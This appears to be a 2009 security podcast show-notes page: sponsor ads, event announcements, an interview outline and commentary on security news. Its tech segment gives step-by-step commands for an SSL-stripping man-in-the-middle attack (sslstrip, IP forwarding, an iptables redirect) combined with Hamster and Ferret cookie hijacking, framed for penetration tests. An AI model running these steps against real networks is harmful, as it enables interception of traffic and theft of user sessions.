- Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
- Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
- Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!
Shameless Plugs & General Announcements
Security Weekly - Episode 174 - For Thursday November 5th, 2009
- We are growing mustaches for Movember! Goto http://securityweekly.com/mo for more information and to make donations to our team that will benefit cancer research.
- Syngress Publishing - Quench your thirst for knowledge at syngress.com and use the referral link or the discount code "Security Weekly" at checkout to save 20% on all security book titles!
- Defensive Intuition - We are also sponsored by Defensive Intuition. Defensive Intuition is the provider of many security consulting services: penetration testing, physical assessments, and social engineering. Defensive Intuition: Owning your boxes, 7 ways to Sunday!
- DOJOCON November 6-7 Dojocon Happening Now!
- Hackfest Canada! - Mick will be speaking/ranting from the Great White North! November 7th, you'll want to be there! Quebec, Canada (This con is so cool it's happening in two languages!)
- The Pittsburgh Information Security Users Group invites all to hear Moxie Marlinspike speak November 10th.
- Mark Baggett's class: SANS Security Essentials Bootcamp Style Charleston, SC - November 9 - 14, 2009
- Community SANS: Sec 542 Web Application Penetration Testing - SANS is pleased to announce Community SANS Providence, running January 11 - 16. Larry will teach Security 542: Web Application Penetration Testing and Ethical Hacking. The course will be hosted by Brown University.
Interview: Ethan Galstad says Nagios Ain't Gonna Insist On Sainthood
- How does Nagios play into the security operations for organizations?
- How do we customize ?
- Why should folks use Nagios vs. another product?
- Where is the project going?
- Where do you go for your Conspiracy Theories?
Tech Segment: Pwnage with the LaFonera Pt III
Now on an internal test, we might not have the list of sites to pre-populate into Metasploit's browser autopwn. So, for those cases, we'll use Hamster and Ferret. Cool. But what happens when things are done "right" and SSL is used?
How about sslstrip?
For pwnage of unsuspecting victims, this will work great for websites on the internet. For internal test, this will deliver pawnage of all internal sites that are using SSL, especially those that we have no concept of potential cookie info or site names.
Add sslstip to a hamster and ferret install, and we can have the best of both worlds: Redirection of SSL sessions, and then the ability to reuse the cookies.
In this case we'll assume that we have a Jaseger setup with Hamster and Ferret from part II on a linux box. We'll install sslstrip, but first we need a few dependencies:
$ sudo apt-get install python twisted-web
Now, let's get and build sslstrip:
$ wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz $ tar zxvf sslstrip-0.6.tar.gz $ cd sslstrip-0.6 $ sudo python ./setup.py install
Now, before we get cracking, we need to make sure were forwarding IP traffic:
$ sudo echo "1" > /proc/sys/net/ipv4/ip_forward)
Then we need a little iptables magic:
$ sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 80
Now we're off with sslstip!
sudo sslstrip.py -l 80
Once complete, we can verify in our hamster/ferret browser window (that we set up in part II - defining our port, etc), which we should now populating with websites, and even those formerly going to SSL sites.
Stories For Discussion
- MITM attack on delayed TLS-client auth through renegotiation - [MikeP] - Late Breaking generic MITM attack against SSL & TLS connections.
- 'Art project' video game attacks Apple Mac machines - [MikeP] - Who knew randomly deleting files on your Mac could be fun?
- Even old patches are important! - [Larry] - Wow, thats interesting. One 3 year old patch reduces potential risks by 75%. We still find systems that are vulnerable to the 75%. Organizations do a good job of OS patches, but Office is an application. However with Microsoft's integrated patching for office now, how can we have this disparity? Or, is this more issues with home systems?
- Leaky baby monitor - [Larry] - Man sues video monitor company because he thought that the video baby monitor was secure. Bought on recommendations of a neighbor, they were able to see each other's video and audio well outside of the range of the monitor. Family assumed that they were secure. So, when does it come to a point hat we have to have warning labels on everything. I mean, how can you assume…
- iPwned via SSH - [Larry] - jailbraking your iPhone has risks, including enabling SSH with default user and password. Thei gentleman scanned IP ranges for SSH on iPhones, hacked them and asked for $$$ for the fix. He then released the fix for free. It was interesting that this released a remote exploit in the form of a default password. Mubix and I had conversations about this at RSS last week, so I thought it was timely.
- more P2P ownage - [Larry] - Please Fed cyber security folks look to what can be done with some SIMPLE DLP.
- ** WARNING: I was angry when I wrote this **
- Why Microsoft Patch Tuesday Is Bullshit - [Paul] - Its an article I wrote about, well, the title gives it away. Basically, we got a regular patch schedule because sysadmins bitched and it cost large organizations too much money to apply patches as they came out. Why Microsoft felt they needed to solve this problem is the bullshit part. Basically, take matters into your own hands when it comes to risk management in your organization, for more check out the article. Feel free to send me flame mail, just no bitching.
- Don't Leave Your Backdoor Open - Someone will find it on Twitter - [Paul Asadoorian] - So here's the deal, if you let a 3rd party app access your Twitter account, then change your password, the 3rd party app can still access your Twitter account. The OAuth protocol apparently allows it to do this, and the only thing you can do is not allow apps, at all, to access you Twitter account. Kinda like federal prison, watch your backdoor someone could exploit it at any moment.
- More SSL Holes - MITM attack - [Paul Asadoorian] - This was the big news, and many of us have heard by now. One thing though that I wanted to point out: "the research is ongoing and many of these attacks are expected to generalize well to other protocols layered on TLS". This means you Mr. "We use SSL VPNs because they are faster and easier to deploy". You pushed the easy button, and the security devil is coming back to collect its debt, guess what? Its not a huge gaping security hole in your organization that could compromised the security of your network, because you compromised and used SSL. You should have known better Mr. "Easy Button", SSL only starts implementing security at Layer 4, way too late. Not to say that anything is perfect or doesn't have vulnerabilities, but you have to be able to see the larger picture and understand what types of things typically lead to bad things, SSL has proven to be one of those things...
- The Tale of an Unsatisfied Security Professional - [Paul] - My fear is that there are many of us in this situation. You are the security "rock star" in your organization, jamming and rocking the crowd every week. However, there atop your organization sits big bad management, right next to the big bad auditors. Management only listens to the auditors, and looks at everything that you do as a "check box". Step outsie anything that smells like a "check box" and its instantly shot down. Let me ask you this, why don't security people weild the same power as the auditors? In fact, why don't the auditors report to us? That way we can keep them in line and make sure we're not just checking fucking boxes.
- Fear and Overreaction - [Paul] - I think Bruce makes some good points, but on the whole I think people need to be more afaid AND act rationaly about it (which is sorta where he is going). People tend to not even let the threats sink in, don't understand the consequences, and therefore don't even react and end up trapped in a burning building. I think that books like Daemon and "Forb1dd3n" are important to people to read and help understand how security threats effect them, and cause them to think about the appropriate action, not over or under reaction.
- [Paul] - I moved some of the "The Interns" Stories here. Mike, better luck next week ;)
- Hardware Hacker Ryan Harris (DerEngel) arrested for various crimes - [The Intern] - Sorry about the arrest of Ryan for Conspiracy, aiding and abetting computer intrusion, and wire fraud. He developed the firmware hacks on Motorolla Surfboard modems that allowed you to unlock your speed and possibly getting free service. [Paul] - Embedded device hacking is fun, federal prison is not. Permission is key, and hacking your own equipment is one thing, hacking someone else's leads to orange jumpsuits and small weapons made out soap.
- turn on a half finished feature of win7 to create virutal wi-fi hotspots - [The Intern] - Story about what was a abandoned feature in Windows 7 being turned on for free. It differs from ad hoc network connectoin sharing of the past that your lap top can look like a virtual WAP. this is advantagious in a situation that you ahve to pay for a connection in a coffee shop. You can use this feature to have your other wifi devices on your virtual WAP and only pay for the laptop connection. [Paul] - This is simply awesome! However, I thought you could do this with Vista too? Nevermind, it was just info gathering and sniffing, see Paper by Josh Wright titled, "Vista Wireless Power Tools".
Other Stories Of Interest
- Untrusted users can get root in some linux distros - [The Intern] - could be useful if you have shell access to a box that is shared web hosting...
- SURPRISE: 8 out of 10 virus work on win7 - [The Intern] I debated this one as its same ol same ol... but if you hate it you can just tell me to STFU and stick to masturbation jokes its all the intern is good at :)
- FaceBook spammer ordered to pony up 711Mil to Facebook - [The Intern] - I think spammers are the scum of the internet and hope they all suffer damages like this ... you will neve see the money granted but wish we can get more off them innanets.
- Password Aging 101 - [MikeP] - Some companies get their Info Sec lessons the hard way
- Google Privacy tools - [MikeP] - Google launches a Dashboard for users to see what Google knows about them. It's low on tools, but a start (probably BETA anyways).